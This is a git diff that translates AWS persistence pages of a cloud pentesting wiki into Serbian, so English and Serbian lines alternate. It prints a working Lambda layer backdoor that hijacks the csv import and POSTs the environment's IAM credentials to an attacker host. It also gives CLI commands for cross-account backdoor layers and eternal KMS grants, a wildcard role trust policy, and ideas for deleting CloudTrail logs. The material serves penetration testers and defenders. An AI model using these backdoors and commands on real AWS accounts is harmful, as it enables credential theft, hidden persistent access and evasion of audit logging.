Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
Umesto da menja kod na aktuelnoj verziji, napadač bi mogao da implementira novu verziju aplikacije sa bekdorom.
### Abusing Custom Resource Lifecycle Hooks
### Zloupotreba Prilagođenih Resursa Lifecycle Hooks
> [!NOTE]
> TODO: Test
Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
Elastic Beanstalk pruža lifecycle hooks koji vam omogućavaju da pokrenete prilagođene skripte tokom postavljanja i gašenja instance. Napadač bi mogao da **konfiguriše lifecycle hook da periodično izvršava skriptu koja exfiltrira podatke ili održava pristup AWS nalogu**.
```bash
bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
{{#include ../../../banners/hacktricks-training.md}}

50
src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
View File

@@ -4,50 +4,44 @@
## IAM
For more information access:
Za više informacija pristupite:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
### Common IAM Persistence
### Uobičajena IAM Persistencija
- Create a user
- Add a controlled user to a privileged group
- Create access keys (of the new user or of all users)
- Grant extra permissions to controlled users/groups (attached policies or inline policies)
- Disable MFA / Add you own MFA device
- Create a Role Chain Juggling situation (more on this below in STS persistence)
- Kreirajte korisnika
- Dodajte kontrolisanog korisnika u privilegovanu grupu
- Kreirajte pristupne ključeve (novog korisnika ili svih korisnika)
- Dodelite dodatne dozvole kontrolisanim korisnicima/grupama (priložene politike ili inline politike)
- Onemogućite MFA / Dodajte svoj MFA uređaj
- Kreirajte situaciju sa lancem uloga (više o ovome u nastavku u STS persistenciji)
### Backdoor Role Trust Policies
You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
### Politike poverenja za backdoor uloge
Možete napraviti backdoor u politiku poverenja kako biste mogli da je preuzmete za spoljašnji resurs koji kontrolišete (ili za sve):
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": ["*", "arn:aws:iam::123213123123:root"]
},
"Action": "sts:AssumeRole"
}
]
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": ["*", "arn:aws:iam::123213123123:root"]
},
"Action": "sts:AssumeRole"
}
]
}
```
### Backdoor Policy Version
Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
Dajte Administrator dozvole politici koja nije u njenoj poslednjoj verziji (poslednja verzija treba da izgleda legitimno), a zatim dodelite tu verziju politike kontrolisanom korisniku/grupi.
### Backdoor / Create Identity Provider
If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
Ako nalog već veruje u zajedničkog provajdera identiteta (kao što je Github), uslovi poverenja mogu biti pojačani kako bi napadač mogao da ih zloupotrebi.
{{#include ../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
View File

@@ -1,43 +1,37 @@
# AWS - KMS Persistence
# AWS - KMS Persistencija
{{#include ../../../banners/hacktricks-training.md}}
## KMS
For mor information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
### Grant acces via KMS policies
### Dodeljivanje pristupa putem KMS politika
An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
Napadač može koristiti dozvolu **`kms:PutKeyPolicy`** da **dodeli pristup** ključa korisniku pod njegovom kontrolom ili čak eksternom nalogu. Pogledajte [**KMS Privesc stranicu**](../aws-privilege-escalation/aws-kms-privesc.md) za više informacija.
### Eternal Grant
### Večna Dodela
Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
Dodele su još jedan način da se principalu daju neka ovlašćenja nad specifičnim ključem. Moguće je dodeliti dodelu koja omogućava korisniku da kreira dodele. Štaviše, korisnik može imati nekoliko dodela (čak i identičnih) nad istim ključem.
Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
Stoga, moguće je da korisnik ima 10 dodela sa svim ovlašćenjima. Napadač bi trebao stalno pratiti ovo. A ako u nekom trenutku 1 dodela bude uklonjena, treba generisati još 10.
(Koristimo 10, a ne 2, da bismo mogli da detektujemo da je dodela uklonjena dok korisnik još uvek ima neku dodelu)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
--key-id <key-id> \
--grantee-principal <user_arn> \
--operations "CreateGrant" "Decrypt"
--key-id <key-id> \
--grantee-principal <user_arn> \
--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id <key-id>
```
> [!NOTE]
> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
> Grant može dati dozvole samo iz ovoga: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../banners/hacktricks-training.md}}

52
src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
View File

@@ -4,7 +4,7 @@
## Lambda
For more information check:
Za više informacija pogledajte:
{{#ref}}
../../aws-services/aws-lambda-enum.md
@@ -12,7 +12,7 @@ For more information check:
### Lambda Layer Persistence
It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
Moguće je **uvesti/otvoriti backdoor u layer da izvrši proizvoljan kod** kada se lambda izvršava na diskretan način:
{{#ref}}
aws-lambda-layers-persistence.md
@@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md
### Lambda Extension Persistence
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
Zloupotrebom Lambda Layers takođe je moguće zloupotrebiti ekstenzije i persistirati u lambdi, ali i ukrasti i izmeniti zahteve.
{{#ref}}
aws-abusing-lambda-extensions.md
{{#endref}}
### Via resource policies
### Putem politika resursa
It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
Moguće je dodeliti pristup različitim lambda akcijama (kao što su pozivanje ili ažuriranje koda) spoljnim nalozima:
<figure><img src="../../../../images/image (255).png" alt=""><figcaption></figcaption></figure>
### Versions, Aliases & Weights
### Verzije, Alias-i & Težine
A Lambda can have **different versions** (with different code each version).\
Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
Lambda može imati **različite verzije** (sa različitim kodom za svaku verziju).\
Zatim, možete kreirati **različite alias-e sa različitim verzijama** lambde i postaviti različite težine za svaku.\
Na ovaj način napadač bi mogao kreirati **backdoored verziju 1** i **verziju 2 sa samo legitimnim kodom** i **izvršavati verziju 1 u 1%** zahteva da ostane diskretan.
<figure><img src="../../../../images/image (120).png" alt=""><figcaption></figcaption></figure>
### Version Backdoor + API Gateway
### Verzija Backdoor + API Gateway
1. Copy the original code of the Lambda
2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
1. Call the API gateway related to the lambda to execute the code
3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
1. This will hide the backdoored code in a previous version
4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
5. Select the POST method created and in Actions select **`Deploy API`**
6. Now, when you **call the function via POST your Backdoor** will be invoked
1. Kopirajte originalni kod Lambde
2. **Kreirajte novu verziju sa backdoor-om** originalnog koda (ili samo sa malicioznim kodom). Objavite i **implementirajte tu verziju** na $LATEST
1. Pozovite API gateway povezan sa lambdom da izvrši kod
3. **Kreirajte novu verziju sa originalnim kodom**, objavite i implementirajte tu **verziju** na $LATEST.
1. Ovo će sakriti backdoored kod u prethodnoj verziji
4. Idite na API Gateway i **kreirajte novu POST metodu** (ili izaberite bilo koju drugu metodu) koja će izvršiti backdoored verziju lambde: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
1. Obratite pažnju na završni :1 u arn **koji označava verziju funkcije** (verzija 1 će biti backdoored u ovom scenariju).
5. Izaberite kreiranu POST metodu i u Akcijama izaberite **`Deploy API`**
6. Sada, kada **pozovete funkciju putem POST-a vaš Backdoor** će biti aktiviran
### Cron/Event actuator
The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
Činjenica da možete **izvršavati lambda funkcije kada se nešto desi ili kada prođe određeno vreme** čini lambdu lepim i uobičajenim načinom za postizanje persistencije i izbegavanje otkrivanja.\
Evo nekoliko ideja kako da učinite svoju **prisutnost u AWS-u diskretnijom kreiranjem lambdi**.
- Every time a new user is created lambda generates a new user key and send it to the attacker.
- Every time a new role is created lambda gives assume role permissions to compromised users.
- Every time new cloudtrail logs are generated, delete/alter them
- Svaki put kada se kreira novi korisnik, lambda generiše novi korisnički ključ i šalje ga napadaču.
- Svaki put kada se kreira nova uloga, lambda dodeljuje dozvole za preuzimanje uloge kompromitovanim korisnicima.
- Svaki put kada se generišu novi cloudtrail logovi, obrišite/izmenite ih
{{#include ../../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
View File

@@ -4,35 +4,35 @@
## Lambda Extensions
Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
Lambda ekstenzije poboljšavaju funkcije integracijom sa raznim **alatima za praćenje, posmatranje, bezbednost i upravljanje**. Ove ekstenzije, dodate putem [.zip arhiva koristeći Lambda slojeve](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) ili uključene u [implementacije kontejnerskih slika](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), rade u dva režima: **interni** i **eksterni**.
- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
- **Interni ekstenzije** se spajaju sa procesom izvršavanja, manipulišući njegovim pokretanjem koristeći **promenljive okruženja specifične za jezik** i **wrapper skripte**. Ova prilagođavanja se primenjuju na niz izvršnih okruženja, uključujući **Java Correto 8 i 11, Node.js 10 i 12, i .NET Core 3.1**.
- **Eksterni ekstenzije** rade kao odvojeni procesi, održavajući usklađenost sa životnim ciklusom Lambda funkcije. Kompatibilni su sa raznim izvršnim okruženjima kao što su **Node.js 10 i 12, Python 3.7 i 3.8, Ruby 2.5 i 2.7, Java Corretto 8 i 11, .NET Core 3.1**, i **prilagođena izvršna okruženja**.
For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
Za više informacija o [**kako lambda ekstenzije funkcionišu proverite dokumentaciju**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
### External Extension for Persistence, Stealing Requests & modifying Requests
### Eksterni Ekstenzija za Održavanje, Krađu Zahteva & Modifikovanje Zahteva
This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
Ovo je sažetak tehnike predložene u ovom postu: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapids heap memory, by design.**
Otkriveno je da je podrazumevani Linux kernel u Lambda okruženju izvršavanja kompajliran sa “**process_vm_readv**” i “**process_vm_writev**” sistemskim pozivima. I svi procesi se izvršavaju sa istim korisničkim ID-jem, čak i novi proces kreiran za eksternu ekstenziju. **To znači da eksterni ekstenzija ima potpuni pristup za čitanje i pisanje u Rapidovu heap memoriju, po dizajnu.**
Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
Štaviše, dok Lambda ekstenzije imaju mogućnost da **pretplate na događaje invokacije**, AWS ne otkriva sirove podatke ovim ekstenzijama. Ovo osigurava da **ekstenzije ne mogu pristupiti osetljivim informacijama** koje se prenose putem HTTP zahteva.
The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
Init (Rapid) proces prati sve API zahteve na [http://127.0.0.1:9001](http://127.0.0.1:9001/) dok se Lambda ekstenzije inicijalizuju i izvršavaju pre nego što se izvrši bilo koji kod izvršavanja, ali nakon Rapida.
<figure><img src="../../../../images/image (254).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png</a></p></figcaption></figure>
The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
Promenljiva **`AWS_LAMBDA_RUNTIME_API`** označava **IP** adresu i **broj** porta Rapid API-ju za **dečije procese izvršavanja** i dodatne ekstenzije.
> [!WARNING]
> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
> Promenom **`AWS_LAMBDA_RUNTIME_API`** promenljive okruženja na **`port`** kojem imamo pristup, moguće je presresti sve akcije unutar Lambda izvršavanja (**man-in-the-middle**). Ovo je moguće jer ekstenzija radi sa istim privilegijama kao Rapid Init, a kernel sistema omogućava **modifikaciju memorije procesa**, omogućavajući promenu broja porta.
Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
Budući da **ekstenzije rade pre bilo kog koda izvršavanja**, modifikovanje promenljive okruženja će uticati na proces izvršavanja (npr. Python, Java, Node, Ruby) kada se pokrene. Štaviše, **ekstenzije učitane nakon** naše, koje se oslanjaju na ovu promenljivu, takođe će prolaziti kroz našu ekstenziju. Ova postavka bi mogla omogućiti malveru da potpuno zaobiđe bezbednosne mere ili ekstenzije za logovanje direktno unutar okruženja izvršavanja.
<figure><img src="../../../../images/image (267).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png</a></p></figcaption></figure>
The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
Alat [**lambda-spy**](https://github.com/clearvector/lambda-spy) je kreiran da izvrši tu **memorijsku pisanje** i **ukrade osetljive informacije** iz lambda zahteva, drugih **ekstenzija** **zahteva** i čak **modifikuje ih**.
## References
@@ -40,7 +40,3 @@ The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created
- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
{{#include ../../../../banners/hacktricks-training.md}}

96
src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
View File

@@ -4,79 +4,72 @@
## Lambda Layers
A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
Lambda layer je .zip datoteka koja **može sadržati dodatni kod** ili drugi sadržaj. Layer može sadržati biblioteke, [prilagođeno vreme izvršavanja](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), podatke ili konfiguracione datoteke.
It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
Moguće je uključiti do **pet layera po funkciji**. Kada uključite layer u funkciju, **sadržaj se ekstraktuje u `/opt`** direktorijum u okruženju izvršavanja.
By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
Po **defaultu**, **layeri** koje kreirate su **privatni** za vaš AWS nalog. Možete odlučiti da **podelite** layer sa drugim nalozima ili da **napravite** layer **javnim**. Ako vaše funkcije koriste layer koji je objavio drugi nalog, vaše funkcije mogu **nastaviti da koriste verziju layera nakon što je obrisana, ili nakon što je vaša dozvola za pristup layeru opozvana**. Međutim, ne možete kreirati novu funkciju ili ažurirati funkcije koristeći obrisanu verziju layera.
Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
Funkcije koje su implementirane kao slika kontejnera ne koriste layer-e. Umesto toga, pakujete svoje omiljeno vreme izvršavanja, biblioteke i druge zavisnosti u sliku kontejnera kada gradite sliku.
### Python load path
The load path that Python will use in lambda is the following:
Putanja učitavanja koju će Python koristiti u lambda je sledeća:
```
['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
```
Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
Proverite kako **druga** i treća **pozicija** zauzimaju direktorijumi gde **lambda slojevi** raspakuju svoje datoteke: **`/opt/python/lib/python3.9/site-packages`** i **`/opt/python`**
> [!CAUTION]
> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation.
> Ako napadač uspe da **ubaci** **backdoor** u korišćeni lambda **sloj** ili **doda jedan** koji će **izvršavati proizvoljan kod kada se učita uobičajena biblioteka**, moći će da izvrši zlonamerni kod sa svakim pozivom lambda funkcije.
Therefore, the requisites are:
Stoga, zahtevi su:
- **Check libraries** that are **loaded** by the victims code
- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library.
- **Proverite biblioteke** koje su **učitane** kodom žrtve
- Kreirajte **proxy biblioteku sa lambda slojevima** koja će **izvršavati prilagođeni kod** i **učitati originalnu** biblioteku.
### Preloaded libraries
### Učitane biblioteke
> [!WARNING]
> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\
> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
> Kada se zloupotrebljava ova tehnika, naišao sam na poteškoću: Neke biblioteke su **već učitane** u python runtime kada se vaš kod izvršava. Očekivao sam da pronađem stvari poput `os` ili `sys`, ali **čak je i `json` biblioteka bila učitana**.\
> Da bi se zloupotrebila ova tehnika postojanosti, kod treba da **učita novu biblioteku koja nije učitana** kada se kod izvršava.
Sa python kodom poput ovog moguće je dobiti **listu biblioteka koje su unapred učitane** unutar python runtime-a u lambda:
```python
import sys
def lambda_handler(event, context):
return {
'statusCode': 200,
'body': str(sys.modules.keys())
}
return {
'statusCode': 200,
'body': str(sys.modules.keys())
}
```
And this is the **list** (check that libraries like `os` or `json` are already there)
I ovo je **lista** (proverite da li su biblioteke kao što su `os` ili `json` već prisutne)
```
'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
```
And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
I ovo je lista **biblioteka** koje **lambda uključuje instalirane po defaultu**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
### Lambda Layer Backdooring
In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
U ovom primeru pretpostavimo da ciljani kod uvozi **`csv`**. Mi ćemo **napraviti backdoor za uvoz `csv` biblioteke**.
For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
This file must:
Da bismo to uradili, kreiraćemo **direktorijum csv** sa fajlom **`__init__.py`** u njemu na putanji koja se učitava od strane lambda: **`/opt/python/lib/python3.9/site-packages`**\
Zatim, kada se lambda izvrši i pokuša da učita **csv**, naš **`__init__.py` fajl će biti učitan i izvršen**.\
Ovaj fajl mora:
- Execute our payload
- Load the original csv library
We can do both with:
- Izvršiti naš payload
- Učitati originalnu csv biblioteku
Možemo uraditi oboje sa:
```python
import sys
from urllib import request
with open("/proc/self/environ", "rb") as file:
url= "https://attacker13123344.com/" #Change this to your server
req = request.Request(url, data=file.read(), method="POST")
response = request.urlopen(req)
url= "https://attacker13123344.com/" #Change this to your server
req = request.Request(url, data=file.read(), method="POST")
response = request.urlopen(req)
# Remove backdoor directory from path to load original library
del_path_dir = "/".join(__file__.split("/")[:-2])
@@ -90,29 +83,27 @@ import csv as _csv
sys.modules["csv"] = _csv
```
Zatim, kreirajte zip sa ovim kodom na putanji **`python/lib/python3.9/site-packages/__init__.py`** i dodajte ga kao lambda layer.
Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
Ovaj kod možete pronaći na [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
Integrisani payload će **poslati IAM kredencijale na server PRVI PUT kada se pozove ili NAKON resetovanja lambda kontejnera** (promena koda ili hladna lambda), ali **druge tehnike** kao što su sledeće takođe mogu biti integrisane:
{{#ref}}
../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
{{#endref}}
### External Layers
### Eksterni Layeri
Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
Also note that the **max number of layers a lambda can have is 5**.
Napomena da je moguće koristiti **lambda layer-e iz eksternih naloga**. Štaviše, lambda može koristiti layer iz eksternog naloga čak i ako nema dozvole.\
Takođe, napomena da je **maksimalan broj layer-a koje lambda može imati 5**.
Therefore, in order to improve the versatility of this technique an attacker could:
- Backdoor an existing layer of the user (nothing is external)
- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
- The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
- The victim **won't see external layers** used with **`aws lambda list-layers`**
Stoga, kako bi poboljšao svestranost ove tehnike, napadač bi mogao:
- Backdoor-ovati postojeći layer korisnika (ništa nije eksterno)
- **Kreirati** **layer** u **svojim nalogu**, dati **nalogu žrtve pristup** da koristi layer, **konfigurisati** **layer** u Lambda žrtve i **ukloniti dozvolu**.
- **Lambda** će i dalje moći da **koristi layer** i **žrtva neće** imati lak način da **preuzme kod layer-a** (osim ako ne dobije rev shell unutar lambda)
- Žrtva **neće videti eksterne layer-e** korišćene sa **`aws lambda list-layers`**
```bash
# Upload backdoor layer
aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
@@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
# Remove permissions
aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
```
{{#include ../../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
View File

@@ -4,34 +4,30 @@
## Lightsail
For more information check:
Za više informacija proverite:
{{#ref}}
../aws-services/aws-lightsail-enum.md
{{#endref}}
### Download Instance SSH keys & DB passwords
### Preuzmite SSH ključeve instance i lozinke za DB
They won't be changed probably so just having them is a good option for persistence
Verovatno se neće promeniti, tako da ih imati je dobra opcija za postojanost
### Backdoor Instances
### Backdoor instance
An attacker could get access to the instances and backdoor them:
Napadač bi mogao dobiti pristup instancama i postaviti backdoor:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key**
- Expose a port with port knocking with a backdoor
